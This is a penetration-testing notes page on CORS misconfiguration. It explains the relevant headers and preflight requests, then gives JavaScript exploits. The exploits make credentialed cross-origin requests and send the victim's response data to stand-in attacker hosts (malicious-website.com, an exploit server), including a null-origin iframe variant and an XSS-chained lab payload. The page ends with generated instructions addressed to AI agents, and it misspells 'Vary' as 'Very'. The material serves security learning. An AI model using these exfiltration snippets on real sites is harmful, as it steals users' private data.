# CORS Misconfiguration

### CORS (Cross-Origin Resource Sharing) defines a mechanism to enable client-side cross-origin requests.

### The web application fails to properly validate the Origin header  and returns the header **`Access-Control-Allow-Credentials: true`**`.`

## header:

```http
Access-Control-Allow-Origin: https://normal-website.com
Access-Control-Allow-Credentials: true
access-control-expose-headers: WWW-Authenticate,Server-Authorization

//request
Origin: null / any website
Very: origin
```

The **`Access-Control-Expose-Headers`** response header allows a server to indicate which response headers should be made available to scripts running in the browser, in response to a cross-origin request.

**`Vary: Origin`**  is crucial for preventing cache confusion and **CORS** errors in **CDN** and **browser caching.**

### Pre-flight checks: <a href="#pre-flight-checks" id="pre-flight-checks"></a>

```
OPTIONS /data HTTP/1.1
Host: <some website>
...
Origin: https://normal-website.com
Access-Control-Request-Method: PUT
Access-Control-Request-Headers: Special-Request-Header
```

## Impact:

* **Data Theft:**  like API keys, SSH keys, Personal identifiable information (PII), or users’ credentials.
* **Cross-Site Scripting (XSS)**: Attackers can use CORS vulnerabilities to perform XSS attacks by injecting malicious scripts into web pages to steal session tokens or perform unauthorized actions on behalf of the user.
* **Remote Code Execution** in some cases ([StackStorm case](https://quitten.github.io/StackStorm/))

## Exploit:

```javascript
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://vulnerable-website.com/sensitive-victim-data',true);
req.setRequestHeader('Very', 'origin');
req.withCredentials = true;
req.send();

function reqListener() {
   location='//malicious-website.com/log?key='+encodeURIComponent(this.responseText);
};
```

#### # for sending with (`Origin: null) header:`

```javascript
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','vuln-web.com/sensitive-data',true);
    req.setRequestHeader('Very', 'origin');
    req.withCredentials = true;
    req.send();
    function reqListener() {
        location='malicious_site.com/log?key='+encodeURIComponent(this.responseText);
    };
</script>"></iframe>

```

#### #if only origin of sub-domain is accepted,then i have to look for a XSS in targer sub-domain.

A demo payload from portswigger:

```
<script>
    document.location="http://stock.YOUR-LAB-ID.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://YOUR-LAB-ID.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>
```

#### To read Header Value:

```javascript
<script>
const client = new XMLHttpRequest();
client.open("GET", "http://localhost:8000", true);
client.send();

client.onreadystatechange = () => {
  if (client.readyState === client.HEADERS_RECEIVED) {
    const contentType = client.getResponseHeader("Authorization");
    alert(contentType);
  
  }
};

```

### Additional Resource:

* <https://www.freecodecamp.org/news/exploiting-cors-guide-to-pentesting/>

### Example Reports:

### Paper:

{% file src="/files/w4T4GFsyXAoF1TiB6nv0" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://shahidulandshamim.gitbook.io/web-application/exploitation/cors-misconfiguration.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.